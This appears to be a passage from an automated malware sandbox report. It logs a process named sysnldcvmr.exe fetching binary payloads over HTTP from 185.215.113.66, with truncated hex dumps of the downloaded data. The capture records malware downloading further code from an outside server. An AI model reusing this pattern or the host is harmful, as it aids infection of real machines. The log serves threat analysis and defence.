                                                                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                  Nov 30, 2024 01:56:43.014612913 CET124INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>
                                                                                                                  Nov 30, 2024 01:56:43.015198946 CET1236INData Raw: 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b 06 4d 8c ed 6c 18 68 d3 b2 17 e9 35
                                                                                                                  Data Ascii: *B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7|VbF9?gk{is6u_pi!
                                                                                                                  Nov 30, 2024 01:56:43.015336037 CET224INData Raw: 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc 99 e4 5b 2b d1 75 73 4c 5e a1 c3 65
                                                                                                                  Data Ascii: Ku"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c
                                                                                                                  Nov 30, 2024 01:56:43.015346050 CET1236INData Raw: 5e d9 5f 0f 45 db e4 9a 9b c1 f7 fd 39 8d d8 38 f1 6b 2d 8a f2 a4 b2 37 05 ca 30 a9 c9 c1 d9 05 7e 3f f9 16 5d 24 3d b3 3d 08 b7 e5 ab 54 2b 0c 54 a7 4d e7 5e ae 65 7e c2 a7 27 ef 1b 19 8f 4f be 9d 28 11 77 95 c0 af 8d 8e 9c 47 87 a1 d7 ef 58 e2
                                                                                                                  Data Ascii: ^_E98k-70~?]$==T+TM^e~'O(wGX\1Y&$_xFLz]BD6Oy[_\4xP9o'eJTwA!Zv MmvgOtWG/C>&2P=e:5eo
                                                                                                                  Nov 30, 2024 01:56:43.015647888 CET24INData Raw: b6 68 e3 5b 91 a2 9b 87 27 33 14 91 c1 98 28 0d 8b cf 40 a5 ba 80 8e b3
                                                                                                                  Data Ascii: h['3(@
                                                                                                                  Nov 30, 2024 01:56:43.015657902 CET1236INData Raw: b3 98 60 7b c2 fe 18 6e 6c 3b f9 ac a2 de d3 91 55 a0 66 42 35 cf 21 d2 35 e4 39 75 47 bc 4a 30 fd b3 ec 68 e2 05 c4 c5 0d b9 52 96 f9 ee 21 eb 75 28 d5 c0 2a 64 ef c0 3a ab 95 53 65 fa 72 6b 02 d9 89 0d 29 a1 42 a0 92 05 af 99 89 64 03 c4 b2 ec
                                                                                                                  Data Ascii: `{nl;UfB5!59uGJ0hR!u(*d:Serk)BdWmlE)Mt9G2?=L*{Pq CT dsHHw+~1uDu,;xuv&eaAwm])pQ`Hvn
                                                                                                                  Nov 30, 2024 01:56:43.015669107 CET1236INData Raw: 5d d4 ae 87 4b 4c 5c f5 f8 b1 42 1c 64 40 21 dd a9 b2 1b 90 9c 81 19 71 86 63 c3 42 58 66 10 97 16 6b 3d 84 2a 17 7d 6e 66 0d 82 1c 4b 89 f7 0c b4 fc 57 4c fe e5 46 ad 79 7f 9e 36 a4 b2 71 69 ed a1 f5 ad 6a 09 6a c9 cc 71 82 36 aa fa 62 12 93 06
                                                                                                                  Data Ascii: ]KL\Bd@!qcBXfk=*}nfKWLFy6qijjq6b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkd*UDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&
                                                                                                                  Nov 30, 2024 01:56:43.015683889 CET248INData Raw: 15 0a b1 41 8b 4d 2d 18 0d 2f 21 95 f5 2c 5d 7f 02 b3 e1 61 f1 81 14 90 ff a6 59 49 c6 b6 95 e1 52 b6 70 e5 9f b1 d7 6f 16 6f 39 ca 52 7f 6a 8d eb 57 0c 60 75 2d b8 22 aa d4 b9 c2 57 7d 76 34 64 44 38 78 a0 68 d0 a0 44 9b 74 71 55 fa f6 a6 80 b6
                                                                                                                  Data Ascii: AM-/!,]aYIRpoo9RjW`u-"W}v4dD8xhDtqUl/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKd
                                                                                                                  Nov 30, 2024 01:56:43.016117096 CET1236INData Raw: 1f c2 c0 01 a9 a1 6d 1c 12 79 22 13 1e 59 39 ac 6f ba 33 c7 51 89 42 71 cf 1c 0c 8a a5 b3 a3 8e 59 56 d1 23 1f 09 19 56 72 38 9b 0a 43 a7 37 de 43 6c 55 38 2e 2a 20 8e 0e 09 cd b6 08 2f b5 3b 37 dc 28 bb df 5e eb 88 be 15 b4 5a 53 48 ba 3e 33 d6
                                                                                                                  Data Ascii: my"Y9o3QBqYV#Vr8C7ClU8.* /;7(^ZSH>3b\hljGkcy`L@&C7W{lxe;c|<>i+,R:ecIfgIDpU^16gr2g"{Sq#<m0r
                                                                                                                  Nov 30, 2024 01:56:43.135580063 CET1236INData Raw: f5 12 b9 95 02 be ba 75 47 ee c3 6f 92 65 e2 78 09 e4 c1 46 cc f6 1a 2a bb a3 8c 2d 7e 51 f6 94 14 b6 19 09 ee 3b 59 30 f7 6f 71 62 a9 7f 81 06 da ca f3 13 9d 08 c3 db 3d 8f 67 08 aa a4 cf 1e b1 d0 cd dc 50 14 2f 04 2d fd 11 53 e2 ae a4 dc c9 10
                                                                                                                  Data Ascii: uGoexF*-~Q;Y0oqb=gP/-SeccZ?m_=UVTM'aYv_w&%k"- 1?3ul2'Kus2)^XCO"N"^E]zgh[


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  23192.168.2.449881185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:45.375960112 CET166OUTGET /3 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:46.805160999 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:56:46 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 63232
                                                                                                                  Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67497f08-f700"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED]
                                                                                                                  Data Ascii: 3-;)VX*\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS*;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t|*wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[*9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
                                                                                                                  Nov 30, 2024 01:56:46.805422068 CET1236INData Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d
                                                                                                                  Data Ascii: 1a@ #o;R`_|#|H%0SH9~`aa-1gH)2sLGnc <k[63N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz|d
                                                                                                                  Nov 30, 2024 01:56:46.805434942 CET448INData Raw: 61 fd 3b da ac 5e 3b f8 33 7c 1b c1 0c 1d 56 7e 50 3f c2 fa 81 13 af aa 2f c8 95 e8 36 df 81 5c 66 94 8a f9 ce 98 df b2 af d9 e7 86 8b 86 8a 8e 12 bc 6e 99 34 38 be 43 e1 a8 a3 35 1f b8 c8 a9 9a 71 82 42 37 b8 af 12 3a 07 5a 08 52 88 6c 72 d8 5b
                                                                                                                  Data Ascii: a;^;3|V~P?/6\fn48C5qB7:ZRlr[X3V8+N[6s>FHj,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]
                                                                                                                  Nov 30, 2024 01:56:46.805561066 CET1236INData Raw: 41 c1 34 56 f2 55 b0 4d af 8a 80 b7 40 d4 5e 95 8a dc 8c 32 38 f4 a5 cc ca e0 ce c7 ca af 2a 42 df ce 62 d9 09 b8 e9 5f 46 17 6b aa 12 de 7a 63 dc 80 4e 8c 51 45 99 44 37 27 8f d3 1a 49 53 4e f2 b7 35 44 4c 5b e4 79 68 89 33 88 00 a3 df b5 a7 6a
                                                                                                                  Data Ascii: A4VUM@^28*Bb_FkzcNQED7'ISN5DL[yh3j}<C*i&`^sM:fmw15=m$>M;8_$*xqY0kw4~KlL)WJ~:n`Ji%}0LZWM$hxw]
                                                                                                                  Nov 30, 2024 01:56:46.805573940 CET1236INData Raw: a8 4d 51 63 eb a7 20 7e d2 fa 29 ba 1b 73 87 fb 92 57 1a 68 37 7a b4 92 d6 a2 34 3e b3 ba 28 e9 b5 6f d3 75 a1 7f ab ce 05 8f e2 c0 b1 aa c1 af 81 e0 c7 72 c7 81 e5 2a 1a 8a 51 d2 3c ea 20 eb 93 03 b2 4d cc 0d b4 39 de 99 4b 3d 32 aa f2 42 ab 9b
                                                                                                                  Data Ascii: MQc ~)sWh7z4>(our*Q< M9K=2B[,/+?~gg).L{A]rbAx=p5KZ;ZrZ_f5dQUe4QJ$?@nw${xTuBenf4Ua]}E_TpJu$"&
                                                                                                                  Nov 30, 2024 01:56:46.805587053 CET1236INData Raw: 7c b3 3e 5f 83 de 43 2b be 5d 80 60 a6 86 4f 47 33 1c e5 b6 64 d9 1d ad 65 db 91 96 7b 74 6c 1a 6e 41 6a bf 7d 97 78 41 fc 07 d8 44 7c c8 dc df a3 6b 02 48 8e 39 47 cb 09 12 56 19 ec 5e 7a 6d 54 eb 7b ef c8 d8 b1 79 fc 3b fe 63 e7 7d 77 92 33 70
                                                                                                                  Data Ascii: |>_C+]`OG3de{tlnAj}xAD|kH9GV^zmT{y;c}w3pRy<V=5a=dUYW-XW>1-2$i00*vq=,P1~#wRpvTW$Kz{]ok>IXj@U;[h
                                                                                                                  Nov 30, 2024 01:56:46.806328058 CET1236INData Raw: 67 33 81 46 d2 a2 1e da 71 8d 02 f5 24 7b 9b 3a e7 05 54 e2 ce 99 87 94 03 3b f4 1f 3b 68 6b d9 52 1f 66 ae b8 18 bc 00 6a d6 46 37 c9 61 fd 94 ba 43 e5 3b ee 40 fb 35 38 a6 dc 48 a9 74 7d 75 c7 86 f5 b7 6f 73 e8 b1 fa 28 92 95 a5 68 91 da 2f 52
                                                                                                                  Data Ascii: g3Fq${:T;;hkRfjF7aC;@58Ht}uos(h/R#`qk1#a_Jx;JO)j <SmPC9P/ScTvD6>$ZvN?|vV%;kat{<h}aX.gcw)!Dc/&nY8}
                                                                                                                  Nov 30, 2024 01:56:46.806340933 CET1236INData Raw: 19 99 16 2c 13 e8 15 b6 89 20 89 bb ea b9 0f 0a f3 0a d1 08 32 f2 9b 53 61 55 44 51 bb 27 5a 5e 43 85 e0 98 fc c0 9e 44 eb bf 4d 8a 60 c3 69 52 fb d4 0c e1 da 53 a5 a4 95 56 4b 73 89 9c 6b 68 40 74 c8 fd 28 54 21 a1 a5 ba 13 c0 e5 2b 78 b5 0f 09
                                                                                                                  Data Ascii: , 2SaUDQ'Z^CDM`iRSVKskh@t(T!+xR<!e_{);$24S8qwj^rPKC68LzmM>.S}SN},@83607DBUIUhi3v+DQ?t5_*}NgCb;Ql*-
                                                                                                                  Nov 30, 2024 01:56:46.806353092 CET1236INData Raw: fe 7d ce 40 84 c1 d8 2d fe 58 17 46 b0 39 5b e1 b0 9c f8 40 c3 ed d5 47 75 fc e6 6b 4b e1 87 75 f7 b4 57 f6 2a f4 ef 1b f7 4e 76 10 81 94 70 fb d3 ec 1b 0f 49 69 8c 41 c2 5c 41 3e 68 46 4c 75 76 d0 eb a0 db 10 59 ea 85 3f 0c 39 f5 3f 34 67 17 fa
                                                                                                                  Data Ascii: }@-XF9[@GukKuW*NvpIiA\A>hFLuvY?9?4gcoJ{eN-Z'DI*G)X/]@Q*6yO11y4I#La!5Pqej3ZH2uDTs%1w/5Zaq:_k}H
                                                                                                                  Nov 30, 2024 01:56:46.806999922 CET1236INData Raw: c5 ab 52 ae 6f 54 0f 16 79 88 5b 95 20 c3 33 b3 1b 6f 3d da da 80 4b 78 aa 4d e0 77 c2 2e 47 a2 76 05 07 70 d7 26 db f4 8b b6 ab 10 a3 b3 51 bf be 1a e2 fa 9f 95 8b 52 d4 d6 be 8a ab 2e 28 58 a0 9a bf 0f 59 49 6c 8a e1 61 c0 ca 9b 19 d4 22 09 a3
                                                                                                                  Data Ascii: RoTy[ 3o=KxMw.Gvp&QR.(XYIla"@|%]~q_io^P~A:ug3G_3NYNTv:lF.PYlN;>&g`;tfQsb7EYE@}b2&wMp5L!'
                                                                                                                  Nov 30, 2024 01:56:46.925201893 CET1236INData Raw: 79 ea 33 65 2f e0 ea 2c 6a b7 1f 33 b9 d8 29 79 c9 58 36 20 83 19 a0 27 35 8c 3a 9c d6 8e a3 0c 3c f7 96 a2 73 40 63 54 79 5e f9 68 8e 90 9f 9d 0d 4c de 9b 8c ec 4f c6 b7 fc 49 b8 97 77 21 f5 28 8e 88 2c f7 5d 9e b5 d5 49 cd e8 6d 76 c7 8a 53 7f
                                                                                                                  Data Ascii: y3e/,j3)yX6 '5:<s@cTy^hLOIw!(,]ImvSp4m|d)JpM:,5xw[G(Bn'TW&l)B6$KinTo=4S2C5[6{7C5`;)`QGAfbY&0zQ\K?D)Q8._[;


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  24192.168.2.449887185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:49.110069036 CET166OUTGET /4 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.427491903 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:56:50 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 55040
                                                                                                                  Last-Modified: Wed, 27 Nov 2024 12:44:32 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67471430-d700"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: a5 d1 27 01 80 df b4 90 f7 22 59 62 49 bd 72 10 5e 6c 42 5f 1c 89 9f 02 51 4d 78 3d 5e 77 28 5e cb 02 3a 58 3a c5 e0 84 da 2e 27 a6 19 84 4a 4f ee 08 33 84 cf 6b 04 b9 e1 3e 23 3e 89 7e fa 42 48 bc f9 b6 1e 73 91 7d 1f 65 ed a5 9a 66 26 40 c5 ff 74 8c 9d be 8a 65 1f 22 55 01 91 b5 68 4b 9a 48 57 10 d8 49 66 f1 5c 5d 98 bb 7c f8 41 87 54 8d 73 20 d1 5a c0 f4 bb 58 ad 46 80 bf 8b 88 96 66 f9 b3 b9 6c 03 e9 ac 53 0f 7e f4 90 e9 0b 3b ff 5f 10 92 6f fb 43 1d d2 b0 a7 96 02 e1 92 48 dc 16 5d e7 b9 11 2f a3 11 ba d4 06 8d 1b f8 90 b0 c0 2b ed 69 c6 3c bc 1e 69 d9 aa 13 bd d3 fc 63 04 97 ef 16 56 c3 bf 5c ec 7a 5f 20 33 b8 8c e6 b4 e8 48 e6 ec 7e 55 2c 56 17 55 9c 72 0a 50 65 41 b1 23 fc 0d 96 40 37 50 9a 83 06 ce 95 c0 60 4e 59 a0 5b 96 20 02 a5 2b 93 26 ea 8f 4e 19 b6 85 78 a4 7e 49 13 fd 9e 97 e4 aa 8f 81 01 9f 15 9d 90 f4 f4 a0 eb 9a a0 44 ba 98 14 42 87 ea ca fa 9a bf 1d a3 b3 b2 90 5c f6 14 db 1b 2f de 0f 92 6e c5 c2 28 2b 32 35 76 91 c5 36 98 6a c5 d0 4c b7 25 38 5c a0 5e 3f 5d 02 d4 1b be e7 00 ff [TRUNCATED]
                                                                                                                  Data Ascii: '"YbIr^lB_QMx=^w(^:X:.'JO3k>#>~BHs}ef&@te"UhKHWIf\]|ATs ZXFflS~;_oCH]/+i<icV\z_ 3H~U,VUrPeA#@7P`NY[ +&Nx~IDB\/n(+25v6jL%8\^?]xZI>ri[@s:p2yO6Q`L,h=8KLKZqaY=7"N5)/I&Os},D>)AS7rEpgsIuV`'A$]`\c3)xe.uW=Y"!-/if{":BKsWc%rW&dJ+g4a`2i=Pp*ks@?wCamFyN7y]Mg<.|smCvDO^_5NjX>,aF:S1xSgsP_z(FHOgZclxIq{.FQ=K3-kFI'~6eKLX 1:YO]S^mpkEbWXcF!wU4W]RHTcwkxbZm#&<r_Ee:gaP#_(3tjO
                                                                                                                  Nov 30, 2024 01:56:50.427683115 CET1236INData Raw: bb 3b 85 b5 56 c5 2a c5 de 28 e1 3a dd 6f 3f 3a 35 2d 53 79 7e b4 92 56 8e 87 da 28 35 12 36 e0 18 20 92 8f 17 51 d3 85 ff ee 32 e6 b3 3f 49 46 e4 34 32 6f d5 de f6 12 6b d8 23 43 17 fb b0 d6 3e 12 29 ee 91 88 fe 40 dc 1e 83 38 56 54 9b 20 93 66
                                                                                                                  Data Ascii: ;V*(:o?:5-Sy~V(56 Q2?IF42ok#C>)@8VT f`:zd!UT&RNEBUNfy7i4hlQJo[Rx[n@gU56QWO.|yDE.brfGY<NE$;F@6G*2r.2(z|FS\e<klZ'
                                                                                                                  Nov 30, 2024 01:56:50.427696943 CET1236INData Raw: b6 67 15 e1 f1 a7 67 d2 68 94 11 e9 01 da 41 ba 6b b8 25 d9 5d 28 3a ca 3e 64 aa 95 d3 fa f2 53 4d 11 76 63 43 d2 bc c9 c9 bb 29 49 c4 14 44 e8 82 3e 2f 2c 96 f5 ff ea 5d 0a 1e 20 7c 83 0d 16 7b 1f 87 54 85 d6 79 95 9c 71 2a d2 08 6e 3d 5c f9 21
                                                                                                                  Data Ascii: gghAk%](:>dSMvcC)ID>/,] |{Tyq*n=\!Tofm`54Rh!x.r-#;z$Ahq)$c_]\QvO7Jy_ED;B1q8dJ5-H?];91oElK4V #~
                                                                                                                  Nov 30, 2024 01:56:50.428251982 CET1236INData Raw: 62 23 b7 c2 e2 0d e6 95 a3 6f 80 1e d8 e9 f3 db db 25 f5 de 57 f8 11 1d d5 9b 07 aa e1 03 80 a6 46 e0 f9 4f 2a c4 1d 47 d0 27 e8 fa 0e 37 21 6c 67 70 88 54 92 99 83 08 62 10 0f 03 5a f9 a5 5f e8 0f 4f a9 c2 50 07 e1 e5 b4 09 1a 6e 5a 5c 3d a2 af
                                                                                                                  Data Ascii: b#o%WFO*G'7!lgpTbZ_OPnZ\=>!4*HbHy|gp'iYw8D/9yeW:3n(#g<tr7;GzbI=VBSY~fn|o_^5.~/3h_Cy1Hz*URy^lx
                                                                                                                  Nov 30, 2024 01:56:50.428262949 CET1236INData Raw: cb 7c 0f da 22 bf 1c 7d f3 28 31 91 59 58 6a ce 9e 13 33 0f 43 a4 5d e8 c1 58 fe 36 8e 37 1c 74 fb 13 d5 c7 35 47 d0 f1 3c 30 ee 69 db 0d 79 b2 07 52 24 eb 5f 36 cb 98 51 0c db 32 ec b1 8e b4 b8 26 30 cf 9c 6b 69 b6 d8 a2 48 6f 05 ea 50 1d ba ff
                                                                                                                  Data Ascii: |"}(1YXj3C]X67t5G<0iyR$_6Q2&0kiHoPkNJ9Fu@Sg~!~$W1,p$;Im*E>&U!kuxgRd33LAIQ0B%{H;JGUiSP7tcd:ZY
                                                                                                                  Nov 30, 2024 01:56:50.428275108 CET1236INData Raw: 95 b5 ac 24 3b 21 0a ff 8c c8 d4 fb 81 53 02 2e 7d ea ac 88 d0 ed d8 f8 76 cd df 05 c2 82 67 1c 01 00 61 83 98 c8 11 29 ff a8 23 ec 64 37 48 6b 4f 8f 6a 23 85 a8 af c5 1a bb 8f 73 e7 cd a8 31 af 07 e3 7c d0 2a ae d3 b5 15 9e 2e b1 e8 d4 3a c9 05
                                                                                                                  Data Ascii: $;!S.}vga)#d7HkOj#s1|*.:{QqZWz)F,#Jf\5T|xKvr/xKx{0:TP$0YW?IdRhA2w;rSdzyy SR<WIiv5vk
                                                                                                                  Nov 30, 2024 01:56:50.429197073 CET1236INData Raw: a4 40 09 cd 34 27 59 c7 fc f3 ad 02 23 ac f0 3f c1 41 8c e6 c5 7b a2 24 0d 3a 0d 07 8f 07 74 97 7c 8a da 16 fe db cf 47 f5 b2 d0 f0 91 2e 47 bf b9 0f 95 04 99 7c 2b dd 89 a7 5b 12 d5 98 3d 7d 64 18 b5 63 10 28 b0 35 cd 18 b2 9c 76 c4 53 04 49 51
                                                                                                                  Data Ascii: @4'Y#?A{$:t|G.G|+[=}dc(5vSIQ7[FU6et<J<8e{jJtwo%h"#S3175?#{ne7+7qvYm ZDK2W[";#h$ew/0P
                                                                                                                  Nov 30, 2024 01:56:50.429209948 CET1236INData Raw: 40 6f 23 87 39 6a 30 34 e1 81 09 49 a1 cb 13 38 33 5d c1 26 75 67 52 b6 8c 90 07 2f b2 d1 ed 24 7a 06 c4 3c 73 18 5a c1 5e d5 31 a3 5a 3b b6 9e 9c 6d cc a1 ed 85 7d 9c 56 ca bf c3 a0 30 6c aa d7 d2 b1 af a8 ba 5b c0 51 cc 05 41 3b e5 65 6a 3c 06
                                                                                                                  Data Ascii: @o#9j04I83]&ugR/$z<sZ^1Z;m}V0l[QA;ej<4VIfQJT6K5P& F#6D2H'xqdGqG/ho2h.{X\szhh$u^hgBK}s'>VYu$/d}
                                                                                                                  Nov 30, 2024 01:56:50.429220915 CET992INData Raw: d3 75 91 96 8b 2a fb 63 1c be 8f e5 fa f0 6a 1c 2d f3 20 ee 97 a1 d7 99 a1 48 74 69 78 17 9f a0 70 f8 56 80 9f a5 a8 e4 ec 9b f1 bb 50 d5 a0 67 5c 2c 91 96 b1 d6 af 4f 31 da bc c8 e9 e9 36 aa df 54 e2 64 c3 ec a7 a5 d4 8e c5 8b ed f8 53 5c 77 50
                                                                                                                  Data Ascii: u*cj- HtixpVPg\,O16TdS\wP:q[Mxjb ?^JYrKjXlf_)Yw8%f%MB:CW,("K)EO2kIB?V&[v\jy)S;=~Vx[Sgv->&m"!%,K#"w
                                                                                                                  Nov 30, 2024 01:56:50.430053949 CET1236INData Raw: 93 b2 be 12 64 0f 9a 69 19 56 0d 7d 1c 6a c1 98 ed 85 ef a3 fb 02 6b 5c b8 9d 7e b3 c5 7c cf 36 86 00 e1 82 d8 0f 7a 99 3b 3a 27 99 ba 25 4f 59 35 6c ff 70 c2 50 82 c3 26 a0 1d c5 ed 7f cd 5a 02 78 b3 96 63 98 1e ef c4 f7 8e 57 3b 50 02 86 10 c5
                                                                                                                  Data Ascii: diV}jk\~|6z;:'%OY5lpP&ZxcW;P$6&a#14b~f6PgutN_/}]^}RU{[Dn3}1I=}?7)+Z<^h\q9}["\JQ/+yw<R
                                                                                                                  Nov 30, 2024 01:56:50.547600985 CET1236INData Raw: 80 d6 2b e3 a9 b3 05 40 66 08 02 e9 71 a0 12 fd 63 bb 47 b2 a4 26 89 c3 6a 59 ac 0a f2 db 9a 4b 93 c8 f1 0d cd 3f 06 51 44 37 73 c5 fe 51 1b d6 95 e2 a8 78 d5 cb d6 b4 52 19 26 2e 7c ae 80 49 60 cb 09 36 ae 24 c4 87 9d b6 98 8e 85 dd fb af df f9
                                                                                                                  Data Ascii: +@fqcG&jYK?QD7sQxR&.|I`6$ +,Gj~;lYDg\t)!j]UlG@qK~bs!/z X^HWG#Whpi`VgFT5l(])B7#B)LW>7"2


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  25192.168.2.449899185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:52.945116043 CET166OUTGET /5 HTTP/1.1
